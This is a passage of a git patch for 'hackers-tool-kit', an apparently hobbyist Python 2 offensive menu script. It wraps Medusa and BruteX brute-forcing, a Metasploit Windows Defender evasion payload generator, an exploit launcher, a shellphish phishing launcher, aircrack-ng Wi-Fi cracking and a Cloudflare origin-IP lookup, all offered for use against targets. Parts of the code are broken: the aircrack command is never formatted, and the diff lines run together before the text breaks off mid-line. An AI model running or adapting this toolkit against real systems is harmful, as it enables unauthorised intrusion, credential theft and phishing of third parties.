hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118040") - - def SHA384(): - hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119020") - def SHA384HMAC(): - hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("119040") - - def SHA256s(): - hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: - jerar.append("120020") - - def SHA384Django(): - hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: - print " [+] SHA-384(Django)" - jerar.append("121020") - - def SHA512(): - hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122020") - def SHA512HMAC(): - hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122060") - def Whirlpool(): - hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122040") - def WhirlpoolHMAC(): - hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("122080") - - - print logo - while True: - jerar=[] - print """ - -------------------------------------------------------------------------""" - hash = raw_input(" HASH: ") - ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() - - if len(jerar)==0: - print "" - print " Not Found." - elif len(jerar)>2: - jerar.sort() - print "" - print "Possible Hashs:" - print "[+] ",algorithms[jerar[0]] - print "[+] ",algorithms[jerar[1]] - print "" - print "Least Possible Hashs:" - for a in range(int(len(jerar))-2): - print "[+] ",algorithms[jerar[a+2]] - else: - jerar.sort() - print "" - print "Possible Hashs:" - for a in range(len(jerar)): - print "[+] ",algorithms[jerar[a]] -#------------------# -#FIND HASH TYPE END# - - -#RESTART SCRIPT START# -#--------------------# -def restart(): - os.system("clear") - os.system("cd /root/hackers-tool-kit && python htk.py") -#------------------# -#RESTART SCRIPT END# - - -#MEDUSA AUTOMATED START# -#----------------------# -def medusa(): - k = raw_input("Target Host: ") - u = raw_input("User: ") - p = raw_input("Wordlist: ") - os.system("cat /root/hackers-tool-kit/tools/medusamods.txt") - print "\n" - m = raw_input("Module: ") - n = raw_input("Port: ") - a = 'medusa -h {0} -u {1} -P {2} -M {3} -n {4}'.format(k,u,p,m,n) - os.system(a) -#--------------------# -#MEDUSA AUTOMATED END# - - -#WAF DETECTER START# -#------------------# -def wafwoof(): - j = raw_input("Enter Target: ") - k = 'wafw00f {0}'.format(j) - os.system(k) -#----------------# -#WAF DETECTER END# - - -#CLOUDFLARE BYPASS START# -#-----------------------# -def cloud(): - - subdomainlist = ["ftp", "cpanel", "webmail" , "mail" , "www", "www1", "www2", "www3", "www4", "www5","ns1", "ns2" , "forums" , "blog"] - - print ('\033[1m' + "CLOUDFLARE BYPASS SCRIPT ") - - host = raw_input("Enter Target: ") - for sublist in subdomainlist: - try: - hosts = str(sublist) + "." + str(host) - showip = socket.gethostbyname(str(hosts)) - print " Cloudflare has begun to be bypassed "+str(showip)+' :| '+str(hosts) - except: - pass - - print ( '\033[93m' + "Credit Goes To: tugrulbey.com") - print ( '\033[92m' + "Credit Goes To: tztugrulbey@protonmail.com") -#---------------------# -#CLOUDFLARE BYPASS END# - - -#BRUTEFORCE ALL SERVICES ON WEB START# -#------------------------------------# -def brutex(): - k = raw_input("Target: ") - p = raw_input("Port: ") - a = 'brutex {0} {1}'.format(k,p) - os.system(a) -#----------------------------------# -#BRUTEFORCE ALL SERVICES ON WEB END# - - -#METERPRETER HELP MENU START# -#---------------------------# -def methelp(): - os.system("cat /root/hackers-tool-kit/tools/meterpreter.txt") -#-------------------------# -#METERPRETER HELP MENU END# - - -#WINDOWS DEFENDER BYPASS START# -#-----------------------------# -def winbyp(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - pay = raw_input("Payload: ") - port = raw_input("Port: ") - name = raw_input("File Name: ") - os.system('echo "use evasion/windows/windows_defender_exe\n" > winbyp.rc') - os.system('echo "set payload {0}\n" >> winbyp.rc'.format(pay)) - os.system('echo "set LHOST 127.0.0.1\n" >> winbyp.rc') - os.system('echo "set LPORT {0}\n" >> winbyp.rc'.format(port)) - os.system('echo "set filename {0}.exe\n" >> winbyp.rc'.format(name)) - os.system('echo "run\n" >> winbyp.rc') - os.system("service postgresql restart") - os.system('msfconsole -r winbyp.rc') - os.system('rm -rf winbyp.rc') -#---------------------------# -#WINDOWS DEFENDER BYPASS END# - - -#USE A EXPLOIT START# -#-------------------# -def exploit(): - os.system("cat /root/hackers-tool-kit/tools/exploits.txt") - print "\n" - f = raw_input("Select Exploit: ") - os.system('echo "use {0}\n" >> exploit.rc'.format(f)) - os.system('echo "show options\n" >> exploit.rc'.format(f)) - os.system("service postgresql restart") - os.system('msfconsole -r exploit.rc') - os.system('rm -rf exploit.rc') -#-----------------# -#USE A EXPLOIT END# - - -#PHISHING AUTOMATED START# -#------------------------# -def phish(): - os.system("bash /root/shellphish/shellphish.sh") -#----------------------# -#PHISHING AUTOMATED END# - - -#LIST DATABASE INFO START# -#------------------------# -def datalist(): - os.system('echo "hosts\n" >> data.rc') - os.system('echo "services\n" >> data.rc') - os.system("service postgresql restart") - os.system('msfconsole -r data.rc') - os.system('rm -rf data.rc') -#----------------------# -#LIST DATABASE INFO END# - - -#ALL METASPLOIT EVASIONS START# -#-----------------------------# -def msfev(): - os.system("service postgresql start") - os.system("""msfconsole -x 'show evasion'""") -#---------------------------# -#ALL METASPLOIT EVASIONS END# - - -#FULLY UPDATE YOUR OS START# -#--------------------------# -def upgrade(): - os.system("apt update && apt upgrade") -#------------------------# -#FULLY UPDATE YOUR OS END# - - -#USE A NMAP SCRIPT START# -#-----------------------# -def nscript(): - os.system("cat /root/hackers-tool-kit/tools/scripts.txt") - print "\n" - j = raw_input(G+"Select Script:\033[0m ") - k = raw_input(G+"Target:\033[0m ") - a = 'nmap --script {0} {1}'.format(j,k) - os.system(a) -#---------------------# -#USE A NMAP SCRIPT END# - - -#GET HOST SSH VERSION START# -#--------------------------# -def sshver(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - b = raw_input(G+"Timeout: \033[0m") - os.system('echo "use auxiliary/scanner/ssh/ssh_version\n" >> sshver.rc') - os.system('echo "set RHOSTS {0}\n" >> sshver.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> sshver.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> sshver.rc'.format(t)) - os.system('echo "set TIMEOUT {0}\n" >> sshver.rc'.format(b)) - os.system('echo "show options\n" >> sshver.rc') - os.system('echo "run\n" >> sshver.rc') - os.system("service postgresql restart") - os.system('msfconsole -r sshver.rc') - os.system('rm -rf sshver.rc') -#------------------------# -#GET HOST SSH VERSION END# - - -#USE PROXYCHAINS FOR WEB START# -#-----------------------------# -def chains(): - h = raw_input("Enter Browser: ") - j = raw_input("Enter Website: ") - a = 'proxychains {0} {1}'.format(h,j) - os.system(a) -#---------------------------# -#USE PROXYCHAINS FOR WEB END# - - -#GET HOST MYSQL VERSION START# -#----------------------------# -def mysqlv(): - f = raw_input(G+"Target: \033[0m") - g = raw_input(G+"Port: \033[0m") - t = raw_input(G+"Threads: \033[0m") - os.system('echo "use auxiliary/scanner/mysql/mysql_version\n" >> mysqlv.rc') - os.system('echo "set RHOSTS {0}\n" >> mysqlv.rc'.format(f)) - os.system('echo "set RPORT {0}\n" >> mysqlv.rc'.format(g)) - os.system('echo "set THREADS {0}\n" >> mysqlv.rc'.format(t)) - os.system('echo "show options\n" >> mysqlv.rc') - os.system('echo "run\n" >> mysqlv.rc') - os.system("service postgresql restart") - os.system('msfconsole -r mysqlv.rc') - os.system('rm -rf mysqlv.rc') -#--------------------------# -#GET HOST MYSQL VERSION END# - - -#CONNECT TO A HOST START# -#-----------------------# -def connect(): - h = raw_input("Enter Host: ") - print "\n" - print " How would you like to connect?" - print "---------------------------------------" - print "ssh: Secure Shell | Default Port = 22" - print "---------------------------------------" - print "telnet: Network Virtual Terminal | Default Port = 23" - print "---------------------------------------" - j = raw_input("Select Protocol: ") - a = '{0} {1}'.format(j,h) - os.system(a) -#---------------------# -#CONNECT TO A HOST END# - - -#ABOUT ME / THE CREATOR START# -#----------------------------# -def about(): - print "\033[92m------------------------------------------------------------" - print "|\033[0m Instagram: @unkn0wn_bali [\033[93mMost Active\033[0m] \033[92m|" - print "------------------------------------------------------------" - print "|\033[0m Twitter: i dont use it that much so i dont even know it \033[92m |" - print "------------------------------------------------------------" - print "|\033[0m Facebook: i dont use it that much so i dont even know it \033[92m|" - print "------------------------------------------------------------" - print "| \033[0mSnapchat: message me on instagram and i'll consider it\033[92m |" - print "------------------------------------------------------------\033[0m" -#--------------------------# -#ABOUT ME / THE CREATOR END# - - -#OPEN NEW TERMINAL START# -#-----------------------# -def terminal(): - os.system("gnome-terminal") -#---------------------# -#OPEN NEW TERMINAL END# - - -#AIRCRACK-NG [WIFI HACK] AUTOMATED START# -#---------------------------------------# -def aircrack(): - b = raw_input(G+"BSSID: \033[0m") - e = raw_input(G+"ESSID: \033[0m") - w = raw_input(G+"Wordlist: \033[0m") - h = raw_input(G+"Handshake file: \033[0m") - os.system("iwconfig") - i = raw_input(G+"Interface: \033[0m") - a = 'aircrack-ng -b {0} -e {1} -w {2} {3} {4}' - os.system(a) -#-------------------------------------# -#AIRCRACK-NG [WIFI HACK] AUTOMATED END# - - -#GET SOURCE CODE OF WEB START# -#----------------------------# -def source(): - t = raw_input(B+"Target:\033[0m ") - print Y+"\nWould you like to save source code in a file?\n\033[0m" - q = raw_input(R+"[y/n]:\033[0m ") - if q == "n": - an = 'curl {0}'.format(t) - os.system(an) - if q == "y": - ay = 'curl {0} >> /root/{1}.txt'.format(t,t) - os.system(ay) - print Y+"\nfile saved > /root/{0}.txt\033[0m".format(t) -#--------------------------# -#GET SOURCE CODE OF WEB END# - - -#WEB DIRECTORY SCAN START# -#------------------------# -def dirscan(): - t = raw_input(B+"Target URL:\033[91m ") - print "\033[0m" - a = 'dirb {0}'.format(t) - os.system(a) -#----------------------# -#WEB DIRECTORY SCAN END# - - - -#APACHE SERVER START# -#-------------------# -def aserver(): - gw = os.popen("ip -4 route show default").read().split() - s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) - s.connect((gw[2], 0)) - ipaddr = s.getsockname()[0] - print Y+"Starting Server\033[0m..." - os.system("service apache2 start") - br = raw_input(G+"Browser: \033[0m") - a = '{0} {1}'.format(br,ipaddr) - os.system(a) - stop = raw_input("hit enter to stop server: ") - print Y+"Stopping Server\033[0m..." - os.system("service apache2 stop") -#-----------------# -#APACHE SERVER END# - - -#CLEAR ALL START# -#---------------# -def clearall(): - os.system("clear") -#-------------# -#CLEAR ALL END# - - -#RUN A FILE START# -#----------------# -def run(): - print Y+"what program do you want to run the file with Example: python" - p = raw_input(N+"Program: ") - print "\n" - print Y+"Example 1: /root/hi/hello.py/ \033[94mExample 2: hello.py\033[0m" - print "\n" - f = raw_input("Enter File: ") - print "\n" - print Y+"would you like to add arguments when running the file [y/n]\033[0m" - yn = raw_input(G+"[y or n]: \033[0m") - if yn == "n" : - a = '{0} {1}'.format(p,f) - os.system(a) - if yn == "y" : - arg = raw_input("Enter Arguments: ") - a = '{0} {1} {2}'.format(p,f,arg) - os.system(a) -#--------------# -#RUN A FILE END# - - -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# -#-------------------------------------------------------------------------------------------------# -def main(): - found = False - while not found: - x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arpspoof": - arpspoof() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - if x == "msfev": - msfev() - if x == "upgrade": - upgrade() - if x == "nscript": - nscript() - if x == "sshver": - sshver() - if x == "chains": - chains() - if x == "mysqlv": - mysqlv() - if x == "connect": - connect() - if x == "about": - about() - if x == "terminal": - terminal() - if x == "aircrack": - aircrack() - if x == "source": - source() - if x == "dirscan": - dirscan() - if x == "aserver": - aserver() - if x == "clearall": - clearall() - if x == "run": - run() - found = True -mainbanner() -main() -#-------------------------------------------------------------------------------------------------# -#THIS IS THE MAIN PART OF THE SCRIPT LIKE WHERE YOU TYPE WHERE IT RUNS THE COMMANDS SHIT LIKE THAT# From 199daf90a94603c116cd3798887df32906592a33 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Thu, 9 May 2019 02:14:20 +0100 Subject: [PATCH 108/214] Add files via upload --- htk.py | 2660 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 2660 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..fcc4af9 --- /dev/null +++ b/htk.py @@ -0,0 +1,2660 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @unkn0wn_bali +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" +#this is the loading screen \ the imports START# +#----------------------------------------------# +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting 